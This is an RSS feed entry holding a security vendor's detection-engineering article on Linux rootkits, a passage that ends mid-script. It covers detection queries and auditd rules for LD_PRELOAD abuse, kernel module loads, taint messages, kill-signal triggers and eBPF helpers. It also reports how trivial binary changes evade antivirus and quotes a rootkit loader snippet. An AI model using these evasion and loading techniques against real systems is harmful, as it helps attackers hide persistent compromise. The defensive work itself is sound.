<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/">
    <channel>
        <title>Elastic Security Labs - Internals</title>
        <link>https://www.elastic.co/kr/security-labs</link>
        <description>Trusted security news &amp; research from the team at Elastic.</description>
        <lastBuildDate>Wed, 22 Apr 2026 13:50:44 GMT</lastBuildDate>
        <docs>https://validator.w3.org/feed/docs/rss2.html</docs>
        <generator>https://github.com/jpmonette/feed</generator>
        <image>
            <title>Elastic Security Labs - Internals</title>
            <url>https://www.elastic.co/kr/security-labs/assets/security-labs-thumbnail.png</url>
            <link>https://www.elastic.co/kr/security-labs</link>
        </image>
        <copyright>© 2026. Elasticsearch B.V. All Rights Reserved</copyright>
        <item>
            <title><![CDATA[Hooked on Linux: Rootkit Detection Engineering]]></title>
            <link>https://www.elastic.co/kr/security-labs/linux-rootkits-2-caught-in-the-act</link>
            <guid>linux-rootkits-2-caught-in-the-act</guid>
            <pubDate>Thu, 02 Apr 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[In this second part of a two-part series, we explore Linux rootkit detection engineering, focusing on the limitations of static detection reliance, and the importance of rootkit behavioral detection.]]></description>
            <content:encoded><![CDATA[<h2>Introduction</h2>
<p>In <a href="https://www.elastic.co/kr/security-labs/linux-rootkits-1-hooked-on-linux">part one</a>, we examined how Linux rootkits work: their evolution, taxonomy, and techniques for manipulating user space and kernel space. In this second part, we turn to detection engineering. We begin by showing why static detection is often unreliable against Linux rootkits, even when binaries are only trivially modified, and then move on to behavioral and runtime signals that defenders can use instead. From shared object abuse and LKM loading to eBPF, io_uring, persistence, and defense evasion, this article focuses on practical ways to detect and investigate rootkit activity in real environments.</p>
<h2>Static detection via VirusTotal</h2>
<p>Before focusing on behavioral detection techniques, it is useful to examine how well traditional static detection mechanisms identify Linux rootkits. To do so, we conducted a small experiment using VirusTotal as a proxy for traditional signature-based antivirus detection. A dataset of ten Linux rootkits was assembled from publicly available research papers and open-source repositories. Each sample was either uploaded to VirusTotal or retrieved from existing submissions.</p>
<p>For every rootkit, we recorded the number of antivirus engines that flagged the original binary. We then performed two additional tests:</p>
<ol>
<li>Stripped binaries, created using <code>strip --strip-all</code>, removing symbol tables and other non-essential metadata.</li>
<li>Trivially modified binaries, created by appending a single null byte to the original file: an intentionally unsophisticated change.</li>
</ol>
<p>The goal was not to evade detection through advanced obfuscation, but to assess how fragile static signatures are when faced with even the simplest binary modifications.</p>
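<p>The two binary modifications are reproducible with standard tooling. The following sketch, using a benign binary as a stand-in for a rootkit sample, shows how each variant was produced:</p>
<pre><code class="language-shell"># Use a benign binary as a stand-in for a rootkit sample
cp /bin/true sample

# Variant 1: strip symbol tables and other non-essential metadata
cp sample sample_stripped
strip --strip-all sample_stripped 2&gt;/dev/null || true

# Variant 2: append a single null byte; program logic is unchanged
cp sample sample_nullbyte
printf '\x00' &gt;&gt; sample_nullbyte

# All variants now produce different hashes, defeating hash-based lookups
sha256sum sample sample_stripped sample_nullbyte
</code></pre>
<p>Both variants remain functional ELF binaries; only their on-disk representation changes.</p>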
<p><em>Table 1: Technical overview of the analyzed rootkit dataset</em></p>
<table>
<thead>
<tr>
<th align="left">Rootkit</th>
<th align="left">Basic detections</th>
<th align="left">Stripped</th>
<th align="left">Null byte added</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left">Azazel</td>
<td align="left">36/66</td>
<td align="left">19/66</td>
<td align="left">21/66</td>
</tr>
<tr>
<td align="left">Bedevil*</td>
<td align="left">32/66</td>
<td align="left">32/66</td>
<td align="left">21/66</td>
</tr>
<tr>
<td align="left">BrokePKG</td>
<td align="left">7/66</td>
<td align="left">3/66</td>
<td align="left">3/66</td>
</tr>
<tr>
<td align="left">Diamorphine</td>
<td align="left">33/66</td>
<td align="left">8/64</td>
<td align="left">22/66</td>
</tr>
<tr>
<td align="left">Kovid</td>
<td align="left">27/66</td>
<td align="left">1/66</td>
<td align="left">15/66</td>
</tr>
<tr>
<td align="left">Mobkit</td>
<td align="left">29/66</td>
<td align="left">6/66</td>
<td align="left">17/66</td>
</tr>
<tr>
<td align="left">Reptile</td>
<td align="left">32/66</td>
<td align="left">3/66</td>
<td align="left">20/66</td>
</tr>
<tr>
<td align="left">Snapekit</td>
<td align="left">30/66</td>
<td align="left">3/66</td>
<td align="left">19/66</td>
</tr>
<tr>
<td align="left">Symbiote</td>
<td align="left">42/66</td>
<td align="left">8/66</td>
<td align="left">22/66</td>
</tr>
<tr>
<td align="left">TripleCross</td>
<td align="left">31/66</td>
<td align="left">17/66</td>
<td align="left">19/66</td>
</tr>
</tbody>
</table>
<p><em>* Bedevil is stripped by default, and thus, the basic and stripped detections are the same</em></p>
<h3>Observations</h3>
<p>As expected, stripping binaries generally resulted in a sharp drop in detection rates. In several cases, detections fell to near-zero, suggesting that some antivirus engines rely heavily on symbol information or other easily removable metadata. Even more telling is the impact of adding a single null byte: a modification that does not alter program logic, execution flow, or behavior, yet still significantly degrades detection for many samples.</p>
<p>This highlights a fundamental weakness of static, signature-based detection. If a one-byte change can meaningfully affect detection outcomes, attackers do not need sophisticated obfuscation to evade static scanners.</p>
<h3>Obfuscation techniques in rootkits</h3>
<p>Interestingly, most of the rootkits in this dataset employ little to no advanced static obfuscation. Where obfuscation is present, it is typically limited to simple XOR encoding of strings or configuration data, or lightweight packing techniques that slightly alter the binary layout. These methods are inexpensive to implement and sufficient to defeat many static signatures.</p>
<p>The absence of more advanced obfuscation in these samples is notable. Many are open-source proof-of-concept rootkits designed to demonstrate techniques rather than to aggressively evade detection. Yet even with minimal or no obfuscation, static detection proves unreliable.</p>
<h3>Why static detection is not enough</h3>
<p>This experiment reinforces a key point: static detection alone is fundamentally insufficient for reliable rootkit detection. The fragility of static signatures (especially in the face of trivial modifications) means defenders cannot rely on file-based indicators or hash-based detection to uncover stealthy threats.</p>
<p>When binaries can be altered without affecting behavior, the only remaining consistent signal is the rootkit's behavior at runtime. For that reason, the remainder of this blog shifts its focus from static artifacts to dynamic analysis and behavioral detection, examining how rootkits interact with the operating system, manipulate execution flow, and leave observable traces during execution.</p>
<p>That is where detection engineering becomes both more challenging and far more effective.</p>
<h2>Dynamic detection engineering</h2>
<h3>Userland rootkit loading detection techniques</h3>
<p>Userland rootkits often hijack the dynamic linking process, injecting malicious shared objects into target processes without needing kernel-level access. An infection begins with the creation of a shared object file. Newly created shared object files can be flagged with a detection rule similar to the one displayed below:</p>
<pre><code class="language-sql">file where event.action == &quot;creation&quot; and
(file.extension like~ &quot;so&quot; or file.name like~ &quot;*.so.*&quot;)
</code></pre>
<p>These files are often written to writable or ephemeral paths such as <code>/tmp/</code>, <code>/dev/shm/</code>, or hidden subdirectories under user home directories. Attackers may download them, compile them on the host, or drop them directly from a loader. This knowledge can be applied to the detection rule above to reduce noise.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/linux-rootkits-2-caught-in-the-act/image7.png" alt="Figure 1: Telemetry example of a shared object rootkit file creation" title="Figure 1: Telemetry example of a shared object rootkit file creation." /></p>
<p>As an example, in the telemetry shown above, we can see the threat actor using <code>scp</code> to download a shared object file into a hidden subdirectory within <code>/tmp</code>, then moving it to a library directory in an attempt to blend in. We detected this, and similar threats, via:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/183b337a01a2e3d6b5a2915887630ffb1df8d822/rules/linux/persistence_shared_object_creation.toml">Shared Object Created by Previously Unknown Process</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/e012e88342d89d6d7f28aac4a7c744ef96b16067/rules/linux/defense_evasion_hidden_shared_object.toml">Creation of Hidden Shared Object File</a></li>
</ul>
<p>Once the shared object file is present on the system, the attacker has several options for activating it. The most commonly abused mechanisms are the <code>LD_PRELOAD</code> environment variable, the <code>/etc/ld.so.preload</code> file, and dynamic linker configuration paths such as <code>/etc/ld.so.conf</code>.</p>
<p>The <code>LD_PRELOAD</code> environment variable allows an attacker to specify a shared object that will be loaded before any other libraries during the execution of a dynamically linked binary. This allows for a complete override of <code>libc</code> functions, such as <code>execve()</code>, <code>open()</code>, or <code>readdir()</code>. This method works on a per-process basis and does not require root access.</p>
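<p>Because <code>LD_PRELOAD</code> travels with the process environment, it remains visible in <code>/proc/&lt;pid&gt;/environ</code>, which is the raw data that environment variable telemetry is built on. A minimal manual triage sketch (the preloaded path is hypothetical; the dynamic linker warns about, then ignores, a missing object):</p>
<pre><code class="language-shell"># Launch a process with a preloaded shared object (hypothetical path)
LD_PRELOAD=/tmp/.X12-unix/libz.so.1 sleep 30 &amp;
pid=$!
sleep 1   # give the shell time to exec the child

# Recover the variable from the kernel's view of the environment; this
# works even if userland functions such as getenv() have been hooked
tr '\0' '\n' &lt; /proc/$pid/environ | grep '^LD_PRELOAD='

kill $pid
</code></pre>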
<p>To detect this technique, telemetry for the <code>LD_PRELOAD</code> environment variable is required. Once this is available, detection logic for uncommon <code>LD_PRELOAD</code> values can be written. For example:</p>
<pre><code class="language-sql">process where event.type == &quot;start&quot; and event.action == &quot;exec&quot; and
process.env_vars like~ &quot;LD_PRELOAD=*&quot;
</code></pre>
<p>As shown in Figure 1, this was also the attackers’ next step: they moved <code>libz.so.1</code> from <code>/tmp/.X12-unix/libz.so.1</code> to <code>/usr/local/lib/libz.so.1</code>.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/linux-rootkits-2-caught-in-the-act/image18.png" alt="Figure 2: Telemetry example of a shared object rootkit load via LD_PRELOAD" title="Figure 2: Telemetry example of a shared object rootkit load via LD_PRELOAD." /></p>
<p>To achieve higher fidelity, we implemented this logic using the <a href="https://www.elastic.co/kr/docs/solutions/security/detect-and-alert/create-detection-rule#create-new-terms-rule">new_terms rule type</a>, flagging only previously unseen shared object entries within the <code>LD_PRELOAD</code> variable via:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/183b337a01a2e3d6b5a2915887630ffb1df8d822/rules/linux/defense_evasion_unusual_preload_env_vars.toml#L18">Unusual Preload Environment Variable Process Execution</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/3e9b8bcdc7c1e70705aa33d3981bae224289a549/rules/linux/defense_evasion_ld_preload_cmdline.toml">Unusual LD_PRELOAD/LD_LIBRARY_PATH Command Line Arguments</a></li>
</ul>
<p>If more than just the <code>LD_PRELOAD</code> and <code>LD_LIBRARY_PATH</code> environment variables are collected, the rule above should be narrowed to target these two variables specifically. To reduce noise further, statistical analysis and/or baselining should be conducted.</p>
<p>Another method of activation is to leverage the <code>/etc/ld.so.preload</code> file. If present, this file forces the dynamic linker to inject the listed shared object into every dynamically linked binary on the system, resulting in global injection.</p>
<p>A similar method involves altering the dynamic linker’s configuration to prioritize malicious library paths. This can be achieved by modifying <code>/etc/ld.so.conf</code> or adding entries to <code>/etc/ld.so.conf.d/</code>, followed by executing <code>ldconfig</code> to update the cache. This changes the resolution path of critical libraries, such as <code>libc.so.6</code>.</p>
<p>These scenarios can be detected by monitoring the <code>/etc/ld.so.preload</code> and <code>/etc/ld.so.conf</code> files, as well as the <code>/etc/ld.so.conf.d/</code> directory for creation/modification events. Using this raw telemetry, a detection rule to flag these events can be implemented:</p>
<pre><code class="language-sql">file where event.action in (&quot;creation&quot;, &quot;rename&quot;) and
file.path like (&quot;/etc/ld.so.preload&quot;, &quot;/etc/ld.so.conf&quot;, &quot;/etc/ld.so.conf.d/*&quot;)
</code></pre>
<p>We frequently see this chain: a shared object is created, and the dynamic linker configuration is then modified.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/linux-rootkits-2-caught-in-the-act/image9.png" alt="Figure 3: Telemetry example of shared object creation followed by dynamic linker configuration creation" title="Figure 3: Telemetry example of shared object creation followed by dynamic linker configuration creation." /></p>
<p>Which we detect via the following detection rules:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/183b337a01a2e3d6b5a2915887630ffb1df8d822/rules/linux/defense_evasion_dynamic_linker_file_creation.toml">Dynamic Linker Creation</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/e012e88342d89d6d7f28aac4a7c744ef96b16067/rules/linux/privilege_escalation_ld_preload_shared_object_modif.toml">Modification of Dynamic Linker Preload Shared Object</a></li>
</ul>
<p>Chaining these two alerts together on a single host warrants investigation.</p>
<h3>Kernel-space rootkit loading detection techniques</h3>
<p>Loading an LKM manually typically requires built-in command-line utilities such as <code>modprobe</code>, <code>insmod</code>, and <code>kmod</code>. Monitoring the execution of these utilities covers the loading phase (when performed manually).</p>
<pre><code class="language-sql">process where event.type == &quot;start&quot; and event.action == &quot;exec&quot; and (
  (process.name == &quot;kmod&quot; and process.args == &quot;insmod&quot; and
   process.args like~ &quot;*.ko*&quot;) or
  (process.name == &quot;kmod&quot; and process.args == &quot;modprobe&quot; and
   not process.args in (&quot;-r&quot;, &quot;--remove&quot;)) or
  (process.name == &quot;insmod&quot; and process.args like~ &quot;*.ko*&quot;) or
  (process.name == &quot;modprobe&quot; and not process.args in (&quot;-r&quot;, &quot;--remove&quot;))
)
</code></pre>
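<p>The first two branches of this rule reflect how most modern distributions package these tools: <code>insmod</code>, <code>modprobe</code>, and related utilities are usually symlinks to the <code>kmod</code> multi-call binary, so the executing process is <code>kmod</code> with the tool name as an argument. Whether a given host follows this layout can be checked locally (paths vary by distribution):</p>
<pre><code class="language-shell"># Resolve what each module utility actually points to; on kmod-based
# systems each resolves to the kmod binary
for tool in insmod modprobe rmmod lsmod; do
    path=$(command -v &quot;$tool&quot; 2&gt;/dev/null) || continue
    printf '%-10s -&gt; %s\n' &quot;$tool&quot; &quot;$(readlink -f &quot;$path&quot;)&quot;
done
</code></pre>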
<p>Many open-source rootkits are published without a loader and rely on pre-installed LKM-loading utilities. An example is <a href="https://github.com/MatheuZSecurity/Singularity">Singularity</a>, which provides a <code>load_and_persistence.sh</code> script that performs several setup actions before eventually calling <code>insmod &quot;$MODULE_DIR/$MODULE_NAME.ko&quot;</code>. Although the command invokes <code>insmod</code>, <code>insmod</code> is actually <code>kmod</code> under the hood, with <code>insmod</code> passed as a process argument. An example of a Singularity load:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/linux-rootkits-2-caught-in-the-act/image15.png" alt="Figure 4: Telemetry example of loading singularity.ko via kmod" title="Figure 4: Telemetry example of loading singularity.ko via kmod." /></p>
<p>Which can be easily detected via the following detection rules:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/e012e88342d89d6d7f28aac4a7c744ef96b16067/rules/linux/persistence_insmod_kernel_module_load.toml">Kernel Module Load via Built-in Utility</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/5d5e1d9ca43c1344927a0e81302bc14cb1891a20/rules/linux/persistence_kernel_module_load_from_unusual_location.toml">Kernel Module Load from Unusual Location</a></li>
</ul>
<p>This detection approach, however, is far from bulletproof, as many rootkits rely on a loader to load the LKM, thereby bypassing execution of these userland utilities.</p>
<p>For example, <a href="https://codeberg.org/hardenedvault/Reptile-vault-range/src/commit/01dc5e1300bf1ba364870c8f4781e085c3c463e9/kernel/loader/loader.c">Reptile’s loader</a> directly invokes the <code>init_module</code> syscall with an in-memory decrypted kernel blob:</p>
<pre><code class="language-c">#define init_module(module_image, len, param_values) syscall(__NR_init_module, module_image, len, param_values)

int main(void) {
    [...]
    do_decrypt(reptile_blob, len, DECRYPT_KEY);
    module_image = malloc(len);
    memcpy(module_image, reptile_blob, len);
    init_module(module_image, len, &quot;&quot;);
    [...]
}
</code></pre>
<p>Additionally, <a href="https://codeberg.org/hardenedvault/Reptile-vault-range/src/commit/01dc5e1300bf1ba364870c8f4781e085c3c463e9/kernel/kmatryoshka/kmatryoshka.c">Reptile’s kmatryoshka module</a> acts as an in-kernel chainloader that decrypts and loads another hidden LKM using a direct function pointer to <code>sys_init_module</code>, located via <code>kallsyms_on_each_symbol()</code>. This further obscures the loading mechanism from userland visibility.</p>
<p>Because of this, it's essential to understand what these utilities do under the hood; they are merely wrappers around the <code>init_module()</code> and <code>finit_module()</code> system calls. Effective detection should therefore focus on tracing these syscalls directly, rather than the tooling that invokes them.</p>
<p>To ensure the availability of the data sources required to detect LKM loads, various security tools can be employed. Auditd or Auditd Manager are suitable choices. To collect the <code>init_module()</code> and <code>finit_module()</code> syscalls, the following configuration can be implemented.</p>
<pre><code class="language-shell">-a always,exit -F arch=b64 -S finit_module -S init_module
-a always,exit -F arch=b32 -S finit_module -S init_module
</code></pre>
<p>Combining this raw telemetry with a detection rule that alerts when this event occurs allows for a strong defense.</p>
<pre><code class="language-sql">driver where event.action == &quot;loaded-kernel-module&quot; and
auditd.data.syscall in (&quot;init_module&quot;, &quot;finit_module&quot;)
</code></pre>
<p>This strategy detects kernel module loading regardless of the utility used for the loading event. In the example below, we see a true positive detection of the <a href="https://github.com/m0nad/Diamorphine">Diamorphine</a> rootkit.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/linux-rootkits-2-caught-in-the-act/image2.png" alt="Figure 5: Telemetry example of detecting the Diamorphine load event via finit_module() syscall" title="Figure 5: Telemetry example of detecting the Diamorphine load event via finit_module() syscall." /></p>
<p>This pre-built rule is available here:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/183b337a01a2e3d6b5a2915887630ffb1df8d822/rules/linux/persistence_kernel_driver_load.toml">Kernel Driver Load</a></li>
</ul>
<p>Additional Linux detection engineering guidance through Auditd is presented in the <a href="https://www.elastic.co/kr/security-labs/linux-detection-engineering-with-auditd">Linux detection engineering with Auditd research</a>.</p>
<h4>Out-of-tree and unsigned modules</h4>
<p>Another sign of a malicious LKM is the presence of the kernel “taint” flag. When a loaded module is not part of the official kernel tree, lacks a valid signature, or uses a non-permissive license, the kernel marks itself as “tainted”. This is a built-in integrity mechanism indicating that the kernel is in a potentially untrusted state. An example is shown below, where the <code>reveng_rtkit</code> module is loaded:</p>
<pre><code class="language-shell">[ 2853.023215] reveng_rtkit: loading out-of-tree module taints kernel.
[ 2853.023219] reveng_rtkit: module license 'unspecified' taints kernel.
[ 2853.023220] Disabling lock debugging due to kernel taint
[ 2853.023297] reveng_rtkit: module verification failed: signature and/or required key missing - tainting kernel
</code></pre>
<p>The kernel identifies the module as out-of-tree, with an unspecified license, and missing cryptographic verification. This results in the kernel being marked tainted.</p>
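<p>The cumulative taint state can also be queried directly during manual triage via <code>/proc/sys/kernel/tainted</code>, a bitmask in which (per the kernel’s admin-guide documentation) bit 12 corresponds to out-of-tree module loads and bit 13 to unsigned module loads. A minimal sketch:</p>
<pre><code class="language-shell"># Read the cumulative taint bitmask; 0 means the kernel was never tainted
taint=$(cat /proc/sys/kernel/tainted)
echo &quot;taint mask: $taint&quot;

# Check the two module-related bits most relevant to rootkit loads
[ $(( taint &gt;&gt; 12 &amp; 1 )) -eq 1 ] &amp;&amp; echo &quot;out-of-tree module was loaded (O)&quot; || true
[ $(( taint &gt;&gt; 13 &amp; 1 )) -eq 1 ] &amp;&amp; echo &quot;unsigned module was loaded (E)&quot; || true
</code></pre>
<p>Note that taint flags are sticky until reboot, so they show that such a load occurred at some point, not that the module is still resident.</p>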
<p>To detect this behavior, system and kernel logging must be parsed and ingested. Once kernel log telemetry is available, simple pattern matching or rule-based detection can flag these events. Out-of-tree module loading can be detected through:</p>
<pre><code class="language-sql">event.dataset:&quot;system.syslog&quot; and process.name:&quot;kernel&quot; and
message:&quot;loading out-of-tree module taints kernel.&quot;
</code></pre>
<p>And similar detection logic can be implemented to detect unsigned module loading:</p>
<pre><code class="language-sql">event.dataset:&quot;system.syslog&quot; and process.name:&quot;kernel&quot; and
message:&quot;module verification failed: signature and/or required key missing - tainting kernel&quot;
</code></pre>
<p>Using the detection logic above, we observed true positives in telemetry of attempts to load Singularity:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/linux-rootkits-2-caught-in-the-act/image17.png" alt="Figure 6: Telemetry example of a kernel taint upon the loading of Singularity" title="Figure 6: Telemetry example of a kernel taint upon the loading of Singularity." /></p>
<p>These rules are available by default in:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/183b337a01a2e3d6b5a2915887630ffb1df8d822/rules/linux/persistence_tainted_kernel_module_load.toml">Tainted Kernel Module Load</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/183b337a01a2e3d6b5a2915887630ffb1df8d822/rules/linux/persistence_tainted_kernel_module_out_of_tree_load.toml">Tainted Out-Of-Tree Kernel Module Load</a></li>
</ul>
<p>The log entry will always show the module name that triggered the event, enabling easy triage. If the LKM cannot be found on the system during a manual check triggered by this alert, the module may be hiding itself.</p>
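<p>That manual check can be sketched as a cross-view comparison: a module named in the kernel log should normally appear in both <code>/proc/modules</code> and <code>/sys/module/</code>. Many rootkits unlink themselves from the module list (hiding from <code>/proc/modules</code> and <code>lsmod</code>), so any mismatch between these views and the log is suspicious. The module name below is hypothetical:</p>
<pre><code class="language-shell">mod=&quot;reveng_rtkit&quot;   # hypothetical name taken from the kernel log

grep -qw &quot;^$mod&quot; /proc/modules \
    &amp;&amp; echo &quot;$mod visible in /proc/modules&quot; \
    || echo &quot;$mod absent from /proc/modules&quot;

[ -d &quot;/sys/module/$mod&quot; ] \
    &amp;&amp; echo &quot;$mod visible in /sys/module&quot; \
    || echo &quot;$mod absent from /sys/module&quot;
</code></pre>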
<h4>Kill signals</h4>
<p>Many (open-source) rootkits leverage <code>kill</code> signals, specifically those in the higher, unassigned ranges (32+), as covert communication channels or triggers for malicious actions. For instance, a rootkit might intercept a specific high-numbered <code>kill</code> signal (e.g., <code>kill -64 &lt;pid&gt;</code>). Upon receiving this signal, the rootkit's payload could be configured to elevate privileges, execute commands, toggle hiding capabilities, or establish a backdoor.</p>
<p>To detect this, we can leverage Auditd and create a rule that collects all kill signals:</p>
<pre><code class="language-shell">-a always,exit -F arch=b64 -S kill -k kill_rule
</code></pre>
<p>The arguments passed to <code>kill()</code> are <code>kill(pid, sig)</code>. We can query <code>a1</code> (the signal number, which Auditd logs in hexadecimal) to flag any kill signal above 32.</p>
<pre><code class="language-sql">process where event.action == &quot;killed-pid&quot; and
auditd.data.syscall == &quot;kill&quot; and auditd.data.a1 in (
&quot;21&quot;, &quot;22&quot;, &quot;23&quot;, &quot;24&quot;, &quot;25&quot;, &quot;26&quot;, &quot;27&quot;, &quot;28&quot;, &quot;29&quot;, &quot;2a&quot;,
&quot;2b&quot;, &quot;2c&quot;, &quot;2d&quot;, &quot;2e&quot;, &quot;2f&quot;, &quot;30&quot;, &quot;31&quot;, &quot;32&quot;, &quot;33&quot;, &quot;34&quot;,
&quot;35&quot;, &quot;36&quot;, &quot;37&quot;, &quot;38&quot;, &quot;39&quot;, &quot;3a&quot;, &quot;3b&quot;, &quot;3c&quot;, &quot;3d&quot;, &quot;3e&quot;,
&quot;3f&quot;, &quot;40&quot;, &quot;41&quot;, &quot;42&quot;, &quot;43&quot;, &quot;44&quot;, &quot;45&quot;, &quot;46&quot;, &quot;47&quot;
)
</code></pre>
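<p>Since Auditd logs syscall arguments in hexadecimal, the list above covers signals 33 through 71: a trigger such as <code>kill -64 &lt;pid&gt;</code>, for example, surfaces as <code>a1=&quot;40&quot;</code>. The conversion is quick to verify:</p>
<pre><code class="language-shell"># Signal 64 in hexadecimal, as it appears in the a1 field
printf '%x\n' 64    # prints: 40

# Regenerate the full hex list for signals 33-71
for sig in $(seq 33 71); do printf '&quot;%x&quot; ' &quot;$sig&quot;; done; echo
</code></pre>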
<p>Analyzing the <code>kill()</code> syscall for unusual signal values via Auditd presents a strong detection opportunity against rootkits that utilize these signals, as seen in techniques such as those employed by Diamorphine. The kill-related pre-built rules are available at:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/5d98a212fcb980a37ee6be2327f861e5af3ede41/rules/linux/defense_evasion_unsual_kill_signal.toml">Unusual Kill Signal</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/e012e88342d89d6d7f28aac4a7c744ef96b16067/rules/linux/defense_evasion_kill_command_executed.toml">Kill Command Execution</a></li>
</ul>
<h4>Segfaults</h4>
<p>Finally, it’s essential to recognize that kernel-space rootkits are inherently fragile. LKMs are typically compiled for a specific kernel version and configuration. An incorrectly resolved symbol or a misaligned memory write may trigger a segmentation fault. While these failures may not immediately expose the rootkit’s functionality, they provide strong forensic signals.</p>
<p>To detect this, raw syslog collection must be enabled. From there, writing a detection rule to flag segfault messages can help identify either malicious behavior or kernel instability, both of which warrant investigation:</p>
<pre><code class="language-sql">event.dataset:&quot;system.syslog&quot; and process.name:&quot;kernel&quot; and message:&quot;segfault&quot;
</code></pre>
<p>This detection rule is available out-of-the-box as <a href="https://www.elastic.co/kr/docs/solutions/security/detect-and-alert/about-building-block-rules">a building block rule</a>:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/5d98a212fcb980a37ee6be2327f861e5af3ede41/rules_building_block/execution_linux_segfault.toml">Segfault Detected</a></li>
</ul>
<p>Combining syscall-level module-loading visibility with kernel taint, out-of-tree messages, kill-signal detection, and segfault alerts lays the foundation for a layered strategy to detect LKM-based rootkits.</p>
<h3>eBPF rootkits</h3>
<p>eBPF rootkits exploit the legitimate functionality of the Linux kernel’s BPF subsystem. Programs can be dynamically loaded and attached using utilities like <code>bpftool</code> or via custom loaders that invoke the <code>bpf()</code> syscall directly.</p>
<p>Detecting eBPF-based rootkits requires visibility into both <code>bpf()</code> syscalls and the use of sensitive eBPF helpers. Key indicators include:</p>
<ul>
<li><code>bpf(BPF_MAP_CREATE, ...)</code></li>
<li><code>bpf(BPF_MAP_LOOKUP_ELEM, ...)</code></li>
<li><code>bpf(BPF_MAP_UPDATE_ELEM, ...)</code></li>
<li><code>bpf(BPF_PROG_LOAD, ...)</code></li>
<li><code>bpf(BPF_PROG_ATTACH, ...)</code></li>
</ul>
<p>Leveraging Auditd, an audit rule can be created where the <code>a0</code> argument (the <code>bpf()</code> command number) selects the specific BPF operations of interest:</p>
<pre><code class="language-shell">-a always,exit -F arch=b64 -S bpf -F a0=0 -k bpf_map_create
-a always,exit -F arch=b64 -S bpf -F a0=1 -k bpf_map_lookup_elem
-a always,exit -F arch=b64 -S bpf -F a0=2 -k bpf_map_update_elem
-a always,exit -F arch=b64 -S bpf -F a0=5 -k bpf_prog_load
-a always,exit -F arch=b64 -S bpf -F a0=8 -k bpf_prog_attach
</code></pre>
<p>These must be tuned on a per-environment basis to ensure that benign programs (e.g., EDRs or other observability tools) that leverage eBPF do not generate noise. Another important signal is the use of eBPF helper functions.</p>
<h4>The bpf_probe_write_user helper function</h4>
<p>The <code>bpf_probe_write_user</code> helper allows kernel-space eBPF programs to write directly to userland memory. Although intended for debugging, this function can be abused by rootkits.</p>
<p>Detection remains challenging, but Linux kernels commonly log the use of sensitive helpers, such as <code>bpf_probe_write_user</code>. Monitoring for these entries offers a detection opportunity, requiring raw syslog collection and specific detection rules, such as the following:</p>
<pre><code class="language-sql">event.dataset:&quot;system.syslog&quot; and process.name:&quot;kernel&quot; and
message:&quot;bpf_probe_write_user&quot;
</code></pre>
<p>This rule will alert on any kernel log entry indicating the use of <code>bpf_probe_write_user</code>. While legitimate tools may occasionally invoke it, unexpected or frequent use, especially alongside suspicious process behavior, warrants investigation. Context, such as the eBPF program’s attachment point and the userland process involved, aids triage. This detection rule is available here:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/5d98a212fcb980a37ee6be2327f861e5af3ede41/rules/linux/persistence_bpf_probe_write_user.toml">Suspicious Usage of bpf_probe_write_user Helper</a></li>
</ul>
<p>Below are a few obvious examples of true positives detected by this logic:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/linux-rootkits-2-caught-in-the-act/image20.png" alt="Figure 7: Telemetry example of bpf_probe_write_user function call via a malicious eBPF program" title="Figure 7: Telemetry example of bpf_probe_write_user function call via a malicious eBPF program." /></p>
<p>The rule triggers on <a href="https://github.com/eeriedusk/nysm">nysm</a> (a stealthy post-exploitation container) and <a href="https://github.com/krisnova/boopkit">boopkit</a> (a Linux eBPF backdoor).</p>
<h3>io_uring rootkits</h3>
<p><a href="https://www.armosec.io/blog/io_uring-rootkit-bypasses-linux-security/">ARMO research</a> (2025) introduced a defense evasion technique that leverages <code>io_uring</code>, a Linux kernel interface for asynchronous I/O, to reduce observable syscall activity and bypass standard telemetry. The technique requires kernel version 5.1 or above and avoids using hooks. Although rootkit authors have only recently adopted the method, it is being actively developed, and its feature set remains relatively immature. An example tool that leverages this technique is <a href="https://github.com/MatheuZSecurity/RingReaper">RingReaper</a>. Rootkits can batch file, network, and other I/O operations via <code>io_uring_enter()</code>. A code example is shown below.</p>
<pre><code class="language-c">struct io_uring_sqe *sqe = io_uring_get_sqe(&amp;ring);
io_uring_prep_read(sqe, fd, buf, size, offset);
io_uring_submit(&amp;ring);
</code></pre>
<p>These calls queue and submit a read request using <code>io_uring</code>, bypassing typical syscall telemetry paths.</p>
<p>Unlike syscall table hooking or <code>LD_PRELOAD</code>-based injection, <code>io_uring</code> is not a rootkit delivery mechanism itself but provides a stealthier means of interacting with the filesystem and devices post-compromise. While <code>io_uring</code> cannot directly execute binaries (due to the lack of <code>execve</code>-like capabilities), it enables malicious actions such as file creation, enumeration, and data exfiltration, while minimizing observability.</p>
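<p>Before building detections, it is worth checking whether <code>io_uring</code> is even available to unprivileged processes on a given host. Kernels 6.6 and later expose the <code>kernel.io_uring_disabled</code> sysctl (0 = enabled, 1 = restricted to privileged or explicitly allowed processes, 2 = fully disabled); a triage sketch, hedged since the knob is absent on older kernels:</p>
<pre><code class="language-shell">if [ -r /proc/sys/kernel/io_uring_disabled ]; then
    echo &quot;io_uring_disabled = $(cat /proc/sys/kernel/io_uring_disabled)&quot;
else
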